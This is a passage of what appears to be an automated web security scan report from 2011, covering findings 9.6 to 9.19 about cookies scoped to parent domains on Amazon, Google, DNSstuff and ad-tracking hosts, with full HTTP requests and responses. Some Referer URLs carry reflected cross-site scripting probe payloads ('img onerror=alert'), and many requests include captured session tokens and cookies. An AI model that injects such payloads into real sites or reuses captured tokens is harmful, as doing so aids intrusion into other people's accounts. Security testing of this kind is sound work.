Host: cts-log.channelintelligence.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.bestbuy.com/site/olstemplatemapper.jsp?id=pcat17410&type=page&carrier_text=Verizon+Wireless&list=y&sc=mobilePlansSP&usc=pcmcat203600050025&documentType=popup&contract_Id=926&contract_text=New+2-yr.+contract&sku_id=2330093&lcn=Mobile+-+Mobile+Package&carrier_Id=929&add_to_pkg=true&removeLinkFacet=&contract_selected=New+2-yr.+contract&plan_type=I
Cookie: serverstamp=6E83F16D%2D7868%2D492A%2DACC1%2D953E4F625CFC

Response

HTTP/1.1 200 OK
Date: Mon, 18 Jul 2011 12:59:28 GMT
Server: Jetty(6.1.22)
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: sessionstamp=07F7194A-0651-B07C-1DBA-0428733D08BC;Domain=.channelintelligence.com;Expires=Mon, 18-Jul-11 13:59:28 GMT
Cache-Control: private,no-store
Content-Length: 42
pragma: no-cache
content-type: image/gif
X-Powered-By: Mirror Image Internet
P3P: CP="OTI DSP COR CURa ADMa DEVa OUR DELa STP"
Via: 1.1 bfi061001 (MII-APC/2.0)

GIF89a.............!.......,........@..D.;

9.6. http://wireless.amazon.com/a  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://wireless.amazon.com
Path:   /a

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /a HTTP/1.1
Host: wireless.amazon.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://wireless.amazon.com/alohaCartRequest?appActionToken=mapUcj2FLhWDrJakFexAot1t0qYRQj3D&appAction=detailAction&asin=B00528E2JU&transaction=INDIVIDUAL_NEW&operation=ADD_DEVICE&zip=1001076487%3Cimg%20src%3da%20onerror%3dalert(1)%3E66af90f3644d32ac9&type=BUNDLE
Cookie: session-id=175-2289931-3243538; session-id-time=1311599127l; ubid-main=188-9421442-7636565; session-token="g5MNmYG+8nWRZ8LG+IOSp1IkH1q+UWtxSVVA/fYm/bDm2BUyDOn97BLd4HDfnpufFh49AwGKfEMoABAshxomL5aFUqZOZcNz/nR2T6GhnRlXI/pu+0O0wLh+f2AdMEo0+21WTNItbxbohlDmhXeiaJ2IZjWTiBh2uz5vqT604l5gYwuYwf25ruyU9JnoYaMwd9e4l/Qd3atVmxfVYWuPHg=="

Response

HTTP/1.1 404 Not Found
Date: Mon, 18 Jul 2011 13:06:02 GMT
Server: Server
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding,User-Agent
Set-Cookie: ubid-main=188-9421442-7636565; Domain=.amazon.com; Expires=Sun, 13-Jul-2031 13:06:02 GMT; Path=/
Set-Cookie: session-token="/SjeTlLmF0RGRITXVYKNKwZCHH347C5P7eCELpGkH6YBweSZFJbTcVh5cBOJSfwHgrYso+8dozzOgEcuyUdx73ordDZtBLVmWg2BxE9QSvNxroj26vS0/yLrNdMvIERhqgW/JkBrtT3hVfC46LzioLcXzBXMMM/UaFsUhjoZ99gmR3JeFHDRiJVFscahbefgpvi/ex2p14mu99fss3m+Vw=="; Version=1; Domain=.amazon.com; Max-Age=600; Expires=Mon, 18-Jul-2011 13:16:02 GMT; Path=/
Content-Length: 8722


<html>

<head>

<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7" />

<script type='text/javascript'>/* <![CDATA[ */
var t0_date = new Date();
var ue_t0 = t0_date.getTime();
var ue_id = '0J
...[SNIP]...

9.7. http://wireless.amazon.com/alohaCartRequest  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://wireless.amazon.com
Path:   /alohaCartRequest

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

POST /alohaCartRequest HTTP/1.1
Host: wireless.amazon.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://wireless.amazon.com/HTC-Trophy-Windows-Verizon-Wireless/dp/B00528E2JU/ref=sh_br_ph_1?ie=UTF8&transaction=INDIVIDUAL_NEW
Content-Length: 156
Cookie: session-id=179-2761153-4689763; session-id-time=1311598655l
Pragma: no-cache
Cache-Control: no-cache

appActionToken=mapUcj2FLhWDrJakFexAot1t0qYRQj3D&appAction=detailAction&asin=B00528E2JU&transaction=INDIVIDUAL_NEW&operation=ADD_DEVICE&zip=10010&type=BUNDLE

Response

HTTP/1.1 200 OK
Date: Mon, 18 Jul 2011 13:01:24 GMT
Server: Server
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding,User-Agent
Set-Cookie: ubid-main=188-9421442-7636565; Domain=.amazon.com; Expires=Sun, 13-Jul-2031 13:01:25 GMT; Path=/
Set-Cookie: session-token="lnKPRD6kZzjcbPBJWWQArMIY660yC2fMiO2Jjs3zjOMF3pc56fdl3iPvsnfsHah2m9lQiQnN6DrjSL/fSlXoqfdfXgkPKYJvJWedfhOppEHBLtxWUbPVnwnHnokBcL5Y3N03P0n2/aCay5IpRT7173LYyddWUsd8V7XxgcylDevao7MTfb2qyx5Jw6EmwuLZsu2xXnBQEKlTgqmTJ00+aQ=="; Version=1; Domain=.amazon.com; Max-Age=600; Expires=Mon, 18-Jul-2011 13:11:25 GMT; Path=/
Content-Length: 1450


{"phoneBrowseNodeId":"/b/684177011","bundleBuildStates":[{"name":"SELECT_PLAN","url":"/b/684182011"}],"didInternalBundleChangeOccur":false,"compatibilityResult":{"isCompatible":true,"compatibil
...[SNIP]...

9.8. https://adwords.google.com/um/StartNewLogin  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://adwords.google.com
Path:   /um/StartNewLogin

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /um/StartNewLogin HTTP/1.1
Host: adwords.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Set-Cookie: AdsUserLocale=en; Path=/; Secure
Set-Cookie: SAG=EXPIRED;Path=/;Expires=Mon, 01-Jan-1990 00:00:00 GMT
Set-Cookie: S=adwords-usermgmt=EP-s7bNspEBUnJAP5n9CoQ; Domain=.google.com; Path=/; Secure; HttpOnly
Location: https://www.google.com/accounts/ServiceLogin?service=adwords&hl=en&ltmpl=adwords&passive=true&ifr=false&alwf=true&continue=https://adwords.google.com/um/gaiaauth?apt%3DNone
X-Invoke-Duration: 14
Content-Type: text/html; charset=UTF-8
Date: Mon, 18 Jul 2011 02:15:50 GMT
Expires: Mon, 18 Jul 2011 02:15:50 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE
Connection: close

<HTML>
<HEAD>
<TITLE>Moved Temporarily</TITLE>
</HEAD>
<BODY BGCOLOR="#FFFFFF" TEXT="#000000">
<H1>Moved Temporarily</H1>
The document has moved <A HREF="https://www.google.com/accounts/ServiceLogin?s
...[SNIP]...

9.9. http://akamai.invitemedia.com/set_partner_uid  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://akamai.invitemedia.com
Path:   /set_partner_uid

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /set_partner_uid?partnerID=199&partnerUID=5F412CC6BA08FD67AA4CC75A0057DA25&sscs_active=1&rurl=4-X2+JIus5OZhrmFIdBs45CYOmKlhG+eZHwUPu4QYWQIvspic+jfcHfQYXqaPpRy030%2fyydVdk1%2f%2fiRE9ZNKYu+uaBc4Ict+6a4jayXS5As6Hgc9gso9XbXeFraCkV8MSnB59Vz3sB31vJ9Qg4OFFuTV+a041ly8rq60spsKEyrApjw0tuGBZu+g%3d%3d&V=3-mtXuJuM%2fvsxM0z5elCSjCr6HXiomqTwDyN9Vx0x8OLV5cRKh288IaV5pjGN+Aa3j HTTP/1.1
Host: akamai.invitemedia.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.verizonwireless.com/b2c/store/controller?item=phoneFirst&action=viewPhoneDetail&selectedPhoneId=5635
Cookie: uid=2ecd6c1e-5306-444b-942d-9108b17fd086; subID="{}"; impressions="{\"580192\": [1308590348+ \"162762637887060014\"+ 29710+ 11561+ 12332]}"; camp_freq_p1="eJzjkuH4vZBVgFGip+nfexYFRo2epc0fWAwYLcB8AJyQC1E="; exchange_uid="eyIyIjogWyI3MjEyMjgyNzE3ODA4MzkwMjAwIiwgNzM0MzIxXSwgIjQiOiBbIkUwIiwgNzM0MzA4XX0="; io_freq_p1="eJzjEua4ECrAKNHT9O89iwGjBZgGAEeuB9s="; segments_p1="eJzjYuFYs4uJi5ljcSKQ+McBJKYqAYnnuVycHPejBY40HfvIwsXCMesQMwDhcQvD"; partnerUID="eyIxMTUiOiBbIjRlMDcxMmFjNjIyYzY0NjEiLCB0cnVlXX0="

Response

HTTP/1.1 302 Moved Temporarily
Server: IM BidManager
P3P: policyref="/w3c/p3p.xml", CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Content-Type: image/gif
Content-Length: 43
Expires: Mon, 18 Jul 2011 13:01:27 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 18 Jul 2011 13:01:27 GMT
Connection: close
Set-Cookie: partnerUID="eyIxMTUiOiBbIjRlMDcxMmFjNjIyYzY0NjEiLCB0cnVlXSwgIjE5OSI6IFsiNUY0MTJDQzZCQTA4RkQ2N0FBNENDNzVBMDA1N0RBMjUiLCB0cnVlXX0="; Domain=invitemedia.com; expires=Tue, 17-Jul-2012 13:01:27 GMT; Path=/
Location: http://cache.vzw.com/images_b2c/mediagallery/exploreFeatures.gif?01RI=04B3966EF2E4199&01CM=cm:akamai.invitemedia.com&01NA=ck&

GIF89a.............!.......,...........D..;

9.10. http://ibid2252027210.peachd.dnsstuff.com/style.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ibid2252027210.peachd.dnsstuff.com
Path:   /style.css

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /style.css HTTP/1.1
Host: ibid2252027210.peachd.dnsstuff.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: RSP_WEBDNS
Date: Mon, 18 Jul 2011 02:16:34 GMT
Content-Type: text/html
Set-Cookie: ID=f3d6c1ad003775; path=/; domain=.DNSstuff.com;
Content-Length: 967

div#login01effectsbox {overflow: hidden; position:absolute; right: 0; top: 0; width: 310px; z-index: 1500; }
div#login01box { background: #ececeb; font-size: 9px; color: #636466; padding: 5px; margin:
...[SNIP]...

9.11. http://ibid2252027210.plumd.dnsstuff.com/style.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ibid2252027210.plumd.dnsstuff.com
Path:   /style.css

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /style.css HTTP/1.1
Host: ibid2252027210.plumd.dnsstuff.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.dnsstuff.com/tools/ipall/?tool_id=67dca4b%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.location)%3Ecbe6d23089b&token=&toolhandler_redirect=0&ip=209.235.10.84
Cookie: PHPSESSIDNS=7c7o2iga9v72hufcgr89r5l7m6; __utma=114379858.362391004.1310954302.1310954302.1310954302.1; __utmb=114379858.3.10.1310954302; __utmc=114379858; __utmz=114379858.1310954302.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; guid=629fad8433489d10f91fe22b85337a2c; ID=f3d6c1ad003861

Response

HTTP/1.1 200 OK
Server: RSP_WEBDNS
Date: Mon, 18 Jul 2011 02:04:30 GMT
Content-Type: text/html
Set-Cookie: ID=f3d6c1ad003861; path=/; domain=.DNSstuff.com;
Content-Length: 967

div#login01effectsbox {overflow: hidden; position:absolute; right: 0; top: 0; width: 310px; z-index: 1500; }
div#login01box { background: #ececeb; font-size: 9px; color: #636466; padding: 5px; margin:
...[SNIP]...

9.12. http://ibid4216487243.plumd.dnsstuff.com/style.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ibid4216487243.plumd.dnsstuff.com
Path:   /style.css

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /style.css HTTP/1.1
Host: ibid4216487243.plumd.dnsstuff.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.dnsstuff.com/tools/ipall/?tool_id=67&token=&toolhandler_redirect=0&ip=209.235.10.84
Cookie: PHPSESSIDNS=7c7o2iga9v72hufcgr89r5l7m6; __utma=114379858.362391004.1310954302.1310954302.1310954302.1; __utmb=114379858.1.10.1310954302; __utmc=114379858; __utmz=114379858.1310954302.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; guid=3b487ce412fcff47f2bec18ba8a3b5dc

Response

HTTP/1.1 200 OK
Server: RSP_WEBDNS
Date: Mon, 18 Jul 2011 01:58:42 GMT
Content-Type: text/html
Set-Cookie: ID=f3d6c1ad003861; path=/; domain=.DNSstuff.com;
Content-Length: 967

div#login01effectsbox {overflow: hidden; position:absolute; right: 0; top: 0; width: 310px; z-index: 1500; }
div#login01box { background: #ececeb; font-size: 9px; color: #636466; padding: 5px; margin:
...[SNIP]...

9.13. http://id.google.com/verify/EAAAADXjHEyNOyxBq7OsNIrjecs.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://id.google.com
Path:   /verify/EAAAADXjHEyNOyxBq7OsNIrjecs.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /verify/EAAAADXjHEyNOyxBq7OsNIrjecs.gif HTTP/1.1
Host: id.google.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.dnsstuff.com/tools/ipall/?tool_id=67&token=&toolhandler_redirect=0&ip=209.235.10.84
Cookie: SNID=49=n94NMJwrzLSil-Hbv9BZR6WcCUH53BkjIxqJL0k2wA=uulSFr7fDxkDHIHz; PREF=ID=19674e168110c698:U=d120d23c9d525969:TM=1308589662:LM=1310648929:S=ACMkKTxqlwFNhYZK; NID=49=AJdW8VAQq0J6jw3LHkdtuSzjOE_qZMzJAZIUTY39X2VsgslDP9tF8cB5Y274660NagMFmiGz-PELt3Z3HRk05Q1bpWqP8M8bttRF0mwTL5dNSfwHPa6dFhWywSQeHY_u

Response

HTTP/1.1 200 OK
Set-Cookie: SNID=49=a-QxWYPkNI-Nufnvk2C9rv3NQWchA8yTMpvQJEFhbw=3JQTMo0bYxLooY3T; expires=Tue, 17-Jan-2012 01:58:52 GMT; path=/verify; domain=.google.com; HttpOnly
Cache-Control: no-cache, private, must-revalidate
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Content-Type: image/gif
Date: Mon, 18 Jul 2011 01:58:52 GMT
Server: zwbk
Content-Length: 43
X-XSS-Protection: 1; mode=block

GIF89a.............!.......,...........D..;

9.14. http://id.google.com/verify/EAAAAETiZvmKxRNEHIAejUJpNLs.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://id.google.com
Path:   /verify/EAAAAETiZvmKxRNEHIAejUJpNLs.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /verify/EAAAAETiZvmKxRNEHIAejUJpNLs.gif HTTP/1.1
Host: id.google.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.dnsstuff.com/tools/ipall/?tool_id=67dca4b%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.location)%3Ecbe6d23089b&token=&toolhandler_redirect=0&ip=209.235.10.84
Cookie: SNID=49=a-QxWYPkNI-Nufnvk2C9rv3NQWchA8yTMpvQJEFhbw=3JQTMo0bYxLooY3T; PREF=ID=19674e168110c698:U=d120d23c9d525969:TM=1308589662:LM=1310648929:S=ACMkKTxqlwFNhYZK; NID=49=AJdW8VAQq0J6jw3LHkdtuSzjOE_qZMzJAZIUTY39X2VsgslDP9tF8cB5Y274660NagMFmiGz-PELt3Z3HRk05Q1bpWqP8M8bttRF0mwTL5dNSfwHPa6dFhWywSQeHY_u

Response

HTTP/1.1 200 OK
Set-Cookie: NID=49=XwWVyBNxwnGNTpllMAJBOS7nfc0GeK5kIXpyO8n0AvIwJSqcFfj4ECTL_npP8jWE6_Jj_qjmPhAEer1IBlpy3dVc5jciEJNCrXoIPfcPa4LHXVxR-GSPooTRnV8-JTc-; expires=Tue, 17-Jan-2012 02:04:39 GMT; path=/; domain=.google.com; HttpOnly
Cache-Control: no-cache, private, must-revalidate
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Content-Type: image/gif
Date: Mon, 18 Jul 2011 02:04:39 GMT
Server: zwbk
Content-Length: 43
X-XSS-Protection: 1; mode=block

GIF89a.............!.......,...........D..;

9.15. http://int.teracent.net/tase/int  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://int.teracent.net
Path:   /tase/int

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /tase/int?adv=134&fmt=redir&sec=0&pid=prod&UAT=catName=Mobile%20Plans|parentCatName=%parentCatName%|uberCatName=%uberCatName%|skuId=%skuId%|productId=%prodId%&catId=pcmcat203600050025&parentCatId=%parentCatId%&uberCatId=%uberCatId% HTTP/1.1
Host: int.teracent.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://switch.atdmt.com/iaction/bestbuy_page/v3/catName.Mobile%20Plans/catId.pcmcat203600050025/recognized.Anonymous/language.en/secChannel.0/skuList.9867653%2C9867644%2C9867608%2C9867592%2C9867574%2C9867486/catalyst_id.%5BCS%5Dv1|27121715051D30BA-40000107E02681AE%5BCE%5D/cache.49234257
Cookie: uid=N357qbE.X2PexF; imp=a$le#1309257444602_119555616_ap2105_int|; p206r=b$u-28#P.7pR|c-4024#5.7pR|

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: p134r=b$u-89#A.7xD|c-pcmcat203600050025#2.7xD|p-prod#2.7xD|; Domain=.teracent.net; Expires=Sat, 14-Jan-2012 12:59:29 GMT; Path=/
Set-Cookie: imp=a$le#1310993969243_14640073_ap2101_int|; Domain=.teracent.net; Expires=Sat, 14-Jan-2012 12:59:29 GMT; Path=/tase
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Expires: Sat, 6 May 1995 12:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Content-Type: image/gif
Content-Length: 43
Date: Mon, 18 Jul 2011 12:59:28 GMT
Connection: close

GIF89a.............!.......,...........D..;

9.16. http://picasaweb.google.com/lh/view  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://picasaweb.google.com
Path:   /lh/view

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /lh/view HTTP/1.1
Host: picasaweb.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Expires: Mon, 18 Jul 2011 02:20:35 GMT
Date: Mon, 18 Jul 2011 02:20:35 GMT
Cache-Control: private, max-age=0, must-revalidate
Set-Cookie: _rtok=SPFBb7O7kkKm; Path=/; HttpOnly
Set-Cookie: S=photos_html=ZtHhGu3O2OSAPyEaExQ31A; Domain=.google.com; Path=/; HttpOnly
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Server: GSE
Connection: close

<html><head>
<meta http-equiv="content-type" content="text/html;charset=utf-8"></meta>
<title>404 NOT_FOUND</title>
<style><!--
body {font-family: arial,sans-serif}
div.nav {margin-top: 1ex}
div.nav A
...[SNIP]...

9.17. http://sales.liveperson.net/hc/44153975/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sales.liveperson.net
Path:   /hc/44153975/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /hc/44153975/?lpCallId=660732486522-110148310186&protV=20&lpjson=1&site=44153975&cmd=mTagKnockPage&id=593087268&javaSupport=true&visitorStatus=INSITE_STATUS&dbut=northeast-consumer-english%7ClpMTagConfig.dbDual%7Clpchatdynamicbuttondiv%7C&cookie=GLOBALID%3DU0rDszSw9SV68cj1hODGnDTHalYNM%252FB%252FuJn%252B7rVAcc%252Fc6GD2xpZ0%252Bs4Orh8A1O1u%3B%20mbox%3DPC%231310569554435-90226.17%231312204729%7Csession%231310993870949-319721%231310996989%7Ccheck%23true%231310995189%3B%20CP%3Dnull*%3B%20__utma%3D96859928.1761841238.1310569615.1310569615.1310993885.2%3B%20__utmz%3D96859928.1310993885.2.2.utmccn%3D%28referral%29%7Cutmcsr%3Dfakereferrerdominator.com%7Cutmcct%3D/referrerPathName%7Cutmcmd%3Dreferral%3B%20%20SESSION_VALUE%3Dm2QBTktQzDgLsGGkf18drMdNkvTHdlJhykC5DM7rpkj8rQVPBXVy%21-1801843931%21mercury%215102%21-1%211310993856497%3B%20TIME_CHECKER%3D1310993856500%3B%20gnVersion%3D2011Jul12104957%3B%20__utmb%3D96859928%3B%20__utmc%3D96859928%3B%20chkcookie%3D1310993892258%3B%20CARTVIEW%3DFALSE%3B%20ZIPCODE%3D10010%3B%20CITY%3DNew%20York%3B%20STATE%3DNY%3B%20devicePageView%3Dlist HTTP/1.1
Host: sales.liveperson.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.verizonwireless.com/b2c/store/controller?item=phoneFirst&action=viewPhoneOverviewByDevice&deviceCategoryId=15
Cookie: LivePersonID=-16601155425835-1310995042:-1:-1:-1:-1; HumanClickKEY=3782573678164176424; HumanClickSiteContainerID_44153975=Master; LivePersonID=LP i=16601155425835,d=1302186497; HumanClickACTIVE=1310995080123

Response

HTTP/1.1 200 OK
Date: Mon, 18 Jul 2011 13:19:00 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Set-Cookie: HumanClickACTIVE=1310995140955; expires=Tue, 19-Jul-2011 13:19:00 GMT; path=/
Content-Type: application/x-javascript
Accept-Ranges: bytes
Last-Modified: Mon, 18 Jul 2011 13:19:00 GMT
Set-Cookie: HumanClickSiteContainerID_44153975=Master; path=/hc/44153975
Set-Cookie: LivePersonID=-16601155425835-1310995042:-1:-1:-1:-1; expires=Tue, 17-Jul-2012 13:19:00 GMT; path=/hc/44153975; domain=.liveperson.net
Cache-Control: no-store
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 27514

lpConnLib.Process({"ResultSet": {"lpCallId":"660732486522-110148310186","lpCallConfirm":"","lpJS_Execute":[{"code_id": "webServerOverride", "js_code": "if (lpMTagConfig.lpServer != 'sales.liveperson.n
...[SNIP]...

9.18. http://wireless.amazon.com/404  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://wireless.amazon.com
Path:   /404

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /404 HTTP/1.1
Host: wireless.amazon.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://burp/show/3
Cookie: session-id=179-6446207-1233155; session-id-time=1311598920l; ubid-main=188-9421442-7636565

Response

HTTP/1.1 404 Not Found
Date: Mon, 18 Jul 2011 13:02:13 GMT
Server: Server
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding,User-Agent
Set-Cookie: ubid-main=188-9421442-7636565; Domain=.amazon.com; Expires=Sun, 13-Jul-2031 13:02:13 GMT; Path=/
Content-Length: 4553


<html>

<head>
<title></title>


<meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/>
</head>

<body>
   <div id="wrapper">
       <div id="innerWrapper">
           <di
...[SNIP]...

9.19. http://wireless.amazon.com/HTC-Trophy-Windows-Verizon-Wireless/dp/B00528E2JU/ref=sh_br_ph_1  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://wireless.amazon.com
Path:   /HTC-Trophy-Windows-Verizon-Wireless/dp/B00528E2JU/ref=sh_br_ph_1

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /HTC-Trophy-Windows-Verizon-Wireless/dp/B00528E2JU/ref=sh_br_ph_1?ie=UTF8&transaction=INDIVIDUAL_NEW HTTP/1.1
Host: wireless.amazon.com
